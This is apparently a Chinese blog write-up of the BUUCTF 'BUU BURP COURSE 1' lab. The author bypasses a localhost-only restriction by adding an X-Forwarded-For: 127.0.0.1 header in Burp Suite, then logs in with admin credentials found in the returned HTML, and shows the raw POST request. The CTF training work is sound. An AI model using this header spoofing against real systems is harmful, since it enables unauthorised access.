BUU BURP COURSE 1

BUU BURP COURSE 1

BUU BURP COURSE 1

HTTP 首部字段详细介绍 - 超超boy - 博客园

打开靶机发现只能本地访问,因此拿 bp 抓包,修一下请求头。经过一番尝试,加 X-Forwarded-For:127.0.0.1 成功访问了。得到一段 html

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="UTF-8">
    <title>登录</title>
</head>
<body>
<div style="text-align: center">
    <form action="" method="post">
        用户名:<input type="text" name="username" value="admin"/><br>
        密码:<input type="password" name="password" value="wwoj2wio2jw93ey43eiuwdjnewkndjlwe"/><br>
        <input type="submit" value="登录"/>
    </form>
</div>
</body>
</html>

POST 方法按照给出的账号密码登录即可。

POST / HTTP/1.1
Host: 1994e278-3628-4701-a30c-79ce5314c08d.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
X-Forwarded-For:127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe
posted @ 2024-11-09 21:08  Maplisky  阅读(56)  评论(0编辑  收藏  举报